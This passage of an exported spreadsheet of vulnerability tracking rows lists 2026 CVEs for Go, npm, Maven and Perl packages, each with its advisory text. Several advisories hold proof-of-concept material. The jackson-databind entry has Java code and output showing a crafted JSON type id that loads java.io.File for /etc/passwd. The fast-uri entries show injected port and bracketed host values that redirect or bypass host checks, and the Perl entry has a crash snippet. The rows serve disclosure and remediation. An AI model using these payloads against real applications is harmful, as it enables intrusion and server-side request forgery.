      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/f1bonacc1/process-compose</t>
        </is>
      </c>
      <c r="M349" s="5" t="inlineStr">
        <is>
          <t>1.120.0</t>
        </is>
      </c>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr"/>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>Process Compose: Browser DNS rebinding lets websites control local process-compose MCP tools in github.com/f1bonacc1/process-compose</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77339</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8074</t>
        </is>
      </c>
      <c r="D350" s="5" t="inlineStr"/>
      <c r="E350" s="5" t="inlineStr"/>
      <c r="F350" s="5" t="inlineStr"/>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M350" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr"/>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't enforce bot-specific permission checks on the user active status endpoint in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8074</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81505</t>
        </is>
      </c>
      <c r="D351" s="5" t="inlineStr"/>
      <c r="E351" s="5" t="inlineStr"/>
      <c r="F351" s="5" t="inlineStr"/>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/frain-dev/convoy</t>
        </is>
      </c>
      <c r="M351" s="5" t="inlineStr">
        <is>
          <t>0.9.3-0.20260724092134-1cc67cd16fb1</t>
        </is>
      </c>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr"/>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>Convoy: Cross-Tenant Source IDOR Leaks Plaintext Message Broker Credentials in github.com/frain-dev/convoy</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81505</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81871</t>
        </is>
      </c>
      <c r="D352" s="5" t="inlineStr"/>
      <c r="E352" s="5" t="inlineStr"/>
      <c r="F352" s="5" t="inlineStr"/>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr">
        <is>
          <t>go, grpc</t>
        </is>
      </c>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr">
        <is>
          <t>Go:go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="M352" s="5" t="inlineStr">
        <is>
          <t>0.21.0</t>
        </is>
      </c>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr"/>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go: Log gRPC exporter ignores env TLS certs, bypassing mTLS/pinning in go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81871</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D353" s="5" t="inlineStr"/>
      <c r="E353" s="5" t="inlineStr"/>
      <c r="F353" s="5" t="inlineStr"/>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M353" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr"/>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>CoreDNS: Unauthenticated memory exhaustion in custom transports in github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83557</t>
        </is>
      </c>
      <c r="D354" s="5" t="inlineStr"/>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M354" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr"/>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>### Summary
`DefaultBaseTypeLimitingValidator` — the `PolymorphicTypeValidator` used automatically whenever `@JsonTypeInfo` is applied without an explicitly configured custom validator — denies polymorphic resolution only for nine specific "unsafe base types" (`Object`, `Serializable`, `Closeable`, `AutoCloseable`, `Cloneable`, `Runnable`, `java.util.logging.Handler`, `javax.naming.Referenceable`, `javax.sql.DataSource`). Its `isSafeSubType()` returns `true` unconditionally for every other base type. `java.lang.Comparable` is not in that list, despite being implemented by a very large fraction of JDK and application classes — comparable in breadth to `Serializable`, which is denylisted for exactly that reason. An application with an `@JsonTypeInfo`-annotated `Comparable`-typed property, and no custom validator configured, will accept a type identifier for essentially any class implementing `Comparable`.
### Details
**Affected file:** `src/main/java/tools/jackson/databind/jsontype/DefaultBaseTypeLimitingValidator.java`
```java
private final static class UnsafeBaseTypes {
    private final Set&lt;String&gt; UNSAFE = new HashSet&lt;&gt;();
    {
        UNSAFE.add(Object.class.getName());
        UNSAFE.add(java.io.Closeable.class.getName());
        UNSAFE.add(java.io.Serializable.class.getName());
        UNSAFE.add(AutoCloseable.class.getName());
        UNSAFE.add(Cloneable.class.getName());
        UNSAFE.add(Runnable.class.getName());          // [databind#5014]
        UNSAFE.add("java.util.logging.Handler");
        UNSAFE.add("javax.naming.Referenceable");
        UNSAFE.add("javax.sql.DataSource");
        // java.lang.Comparable is NOT present here
    }
}
protected boolean isSafeSubType(DatabindContext ctxt,
        JavaType baseType, JavaType subType) {
    return true;   // unconditional for every base type not in UNSAFE
}
```
The class's own JavaDoc acknowledges the design (*"Note that when using potentially unsafe base type like `java.lang.Object` a custom implementation... is needed"*), so the trade-off of leaving broad base types unrestricted is intentional. The gap is that `Comparable` has the same breadth of implementers as the types this class *does* restrict, and its absence looks like an oversight rather than a deliberate choice — consistent with the ongoing, incremental nature of this list (`Runnable` was added recently for issue #5014).
This is specific to the **default, unconfigured validator** reached via bare `@JsonTypeInfo` usage. Global "Default Typing" via `activateDefaultTyping()` is **not** affected, because that method structurally requires an explicit `PolymorphicTypeValidator` argument — a correctly-configured `BasicPolymorphicTypeValidator` rejects the same payload under `activateDefaultTyping()`.
### PoC
Built entirely from source (jackson-databind + jackson-core + jackson-annotations, `javac`, OpenJDK 21, no third-party gadget libraries, no network access):
**1. Sanity check (benign class, confirms the mechanism fires):**
```java
static class SafeThing implements Comparable&lt;SafeThing&gt; {
    public String name;
    public SafeThing() {}
    public int compareTo(SafeThing o) { return 0; }
}
static class Holder {
    @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
    public Comparable&lt;?&gt; value;
}
ObjectMapper mapper = JsonMapper.builder().build();   // no custom PTV
String json = "{\"value\":{\"@class\":\"...SafeThing\",\"name\":\"hello\"}}";
Holder h = mapper.readValue(json, Holder.class);
// RESULT: ACCEPTED, class=...SafeThing
```
**2. Real JDK class substitution:**
```java
String json = "{\"value\":[\"java.io.File\",\"/etc/passwd\"]}";
Holder h = mapper.readValue(json, Holder.class);
// RESULT: ACCEPTED, class=java.io.File value=/etc/passwd
```
**3. Negative control — Default Typing with an explicit custom PTV:**
```java
PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
    .allowIfSubType("PtvGapTest4").build();
ObjectMapper mapper = JsonMapper.builder()
    .activateDefaultTyping(ptv, DefaultTyping.NON_FINAL).build();
// same java.io.File payload
// RESULT: REJECTED - InvalidTypeIdException: "...denied resolution"
```
**Observed output:**
$ java -cp .:build/classes PtvGapTest3
Trying: {"value":["java.io.File","/etc/passwd"]}
ACCEPTED, class=java.io.File value=/etc/passwd
$ java -cp .:build/classes PtvGapTest4
Trying malicious substitution: ["PtvGapTest4$Holder",{"value":["java.io.File","/etc/passwd"]}]
REJECTED - InvalidTypeIdException: Could not resolve type id 'java.io.File' as a
subtype of java.lang.Comparable: Configured PolymorphicTypeValidator denied resolution
### Impact
Any application declaring an `@JsonTypeInfo`-annotated property or class with `Comparable` as its base type, without a separately configured restrictive `PolymorphicTypeValidator`, will accept a type identifier for essentially any class implementing `Comparable`. Concrete impact is demonstrated via `java.io.File`: an attacker can cause construction of a `File` object for an arbitrary, attacker-chosen path. On its own this is a controlled-object-instantiation primitive; if the application later calls path-sensitive or mutating methods on the received value, this becomes a path-traversal-adjacent primitive. 
**Suggested remediation:**
1. Add `java.lang.Comparable` to `UnsafeBaseTypes.UNSAFE`.
2. Audit other broad JDK interfaces (`java.lang.Iterable`, `java.util.EventListener`) for the same gap.
3. Consider a narrower default for `isSafeSubType()` for base types outside the fixed denylist, rather than unconditional `true`.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83557</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84292</t>
        </is>
      </c>
      <c r="D355" s="5" t="inlineStr"/>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M355" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr"/>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` serializes the `port` component of a URI without validating it. When recomposing the authority, `fast-uri` escapes the userinfo and host components but concatenates the port verbatim, so a `port` value that is not a sequence of digits can inject authority delimiters. For example, serializing a component whose `port` is `@127.0.0.1:8124` produces `http://trusted.example:@127.0.0.1:8124/app`, demoting the intended host to userinfo and pointing the authority at an attacker-controlled host. Both `fast-uri` and Node's `URL` read the result back as the attacker's host with no error, so re-validating the built URI does not catch it.
This affects applications that build URIs from parts and assign untrusted data to the `port` component (for example a fixed host from configuration and a port taken from user input or a service record). The same path is reachable through `serialize()`, `normalize()`, and `equal()` in their object forms. A `port` obtained from `parse()` is always digits and is not affected.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `recomposeAuthority` now rejects any port that is not `*DIGIT` per RFC 3986. All users should upgrade.
### Workarounds
If upgrading is not immediately possible, validate the `port` value against the RFC 3986 grammar (digits only) before passing a component to `serialize()`, `normalize()`, or `equal()`, and reject anything else, for example `if (!/^\d*$/.test(String(port))) throw new Error('invalid port')`.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84292</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84394</t>
        </is>
      </c>
      <c r="D356" s="5" t="inlineStr"/>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M356" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr"/>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` accepts a host that contains an unbalanced or misplaced authority bracket (`[` or `]`) without reporting an error. A host that starts with `[` but does not end with `]`, such as `[@127.0.0.1`, is neither validated as an IP literal nor canonicalized as a domain name, so `parse()` returns it as the host with `error` undefined, while Node's `URL` (and `http.get`, `axios`, `got`, and other clients built on it) resolve the same string to `127.0.0.1`. An application that reads `parse().host` to make a host decision (an SSRF denylist, a redirect allowlist, or proxy routing) and then passes the original URL to an HTTP client evaluates its policy against a string that is not the host the request reaches. The same host is carried through `normalize()`, `equal()`, and `resolve()`.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `parse()` now reports `URI host is malformed.` for any host that contains a bracket but is not a valid `[IPv6]` literal. All users should upgrade.
### Workarounds
If upgrading is not immediately possible, reject any URL whose host contains a `[` or `]` that is not a well-formed IPv6 literal before making a host decision. Clients that fail closed on credential-bearing URLs, such as Node's global `fetch()`, are not affected by the reported vector.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84394</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84894</t>
        </is>
      </c>
      <c r="D357" s="5" t="inlineStr"/>
      <c r="E357" s="5" t="inlineStr"/>
      <c r="F357" s="5" t="inlineStr"/>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr"/>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>In moxygen before commit 004123dd24c3, MoQSession::dataStreamReadLoop keeps using a stream read handle after reading a FIN, which invalidates the handle under proxygen's WebTransport API. A remote peer can trigger the stale use by opening a data stream that names an unknown track alias and carries the FIN in the same write.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84894</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84895</t>
        </is>
      </c>
      <c r="D358" s="5" t="inlineStr"/>
      <c r="E358" s="5" t="inlineStr"/>
      <c r="F358" s="5" t="inlineStr"/>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr"/>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>In proxygen from v2026.04.06.00 until v2026.09.28.00, QuicWtSession::closeSession accesses its member fields after calling the base QuicWtSessionBase::closeSession method. The base method notifies the session handler, which may release the last reference to the session and destroy it.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84895</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85024</t>
        </is>
      </c>
      <c r="D359" s="5" t="inlineStr"/>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr">
        <is>
          <t>npm:undici</t>
        </is>
      </c>
      <c r="M359" s="5" t="inlineStr">
        <is>
          <t>6.28.1, 7.29.1, 8.10.2</t>
        </is>
      </c>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr"/>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>## Impact
undici's WebSocket client (including Node.js's bundled `globalThis.WebSocket`) crashes the entire Node.js process when a remote WebSocket peer sends a permessage-deflate compressed message that crosses the decompressed-payload size limit and then contains a malformed DEFLATE block. In `lib/web/websocket/permessage-deflate.js`, the size-limit cleanup calls `removeAllListeners()` on the internal zlib `InflateRaw`, removing its `error` listener, but leaves the stream running. The inflater then emits a `Z_DATA_ERROR` with no listener attached, which Node.js treats as a fatal unhandled `error` event and terminates the process. Application `error`/`close` handlers on the public WebSocket cannot observe or prevent this, because the failing object is the internal `InflateRaw`.
A malicious or compromised WebSocket server can crash a client with a single connection, unauthenticated and without any application mistake. The attack is asymmetric (about 130 KB on the wire expands past the limit) and can be repeated on reconnect (crash loop).
Affected applications are those using the undici WebSocket client (`new WebSocket(...)`) or Node.js's bundled `globalThis.WebSocket` that can be induced to connect to an attacker-controlled or compromised WebSocket endpoint.
## Patches
Upgrade to undici v6.28.1, v7.29.1 or v8.10.2.
## Workarounds
No workaround is available.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85024</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85644</t>
        </is>
      </c>
      <c r="D360" s="5" t="inlineStr"/>
      <c r="E360" s="5" t="inlineStr"/>
      <c r="F360" s="5" t="inlineStr"/>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>XS::Parse::Infix versions from 0.40 through 0.49 for Perl treat a number as an array reference.
The wrapper function XS::Parse::Infix generates for a list-associative infix operator checks whether arguments are array references, but it tests using SvRV() rather than SvROK(). SvRV() reads a union slot that only holds a referent once SvROK(sv) is true, so the guard never validates that it is a reference. For an IV or NV that slot holds the number itself, SvRV() returns the caller's value and SvTYPE() dereferences it at offset 12. This will generally result in a segmentation fault.
An application that hands the wrapper a list built from decoded input (for example, from JSON) lets whoever supplies a number in that list choose the address that the interpreter dereferences.
An ordinary string's byte 12 is rarely SVt_PVAV so the guard croaks by luck, but an attacker-crafted string carrying 0x0b there passes, and the buffer is then used as an AV head, with AvARRAY taken from bytes 16-23 and its entries pushed onto the Perl stack as live SVs.
A simple proof-of-concept uses the zip operator:
    use Syntax::Operator::Zip 'zip';
    my @args = ([1], 2);
    zip(@args);</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85644</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D361" s="5" t="inlineStr"/>
      <c r="E361" s="5" t="inlineStr"/>
      <c r="F361" s="5" t="inlineStr"/>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M361" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr"/>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>CoreDNS DoH/DoQ/gRPC bypass UPDATE rejection enforced on UDP/TCP in github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
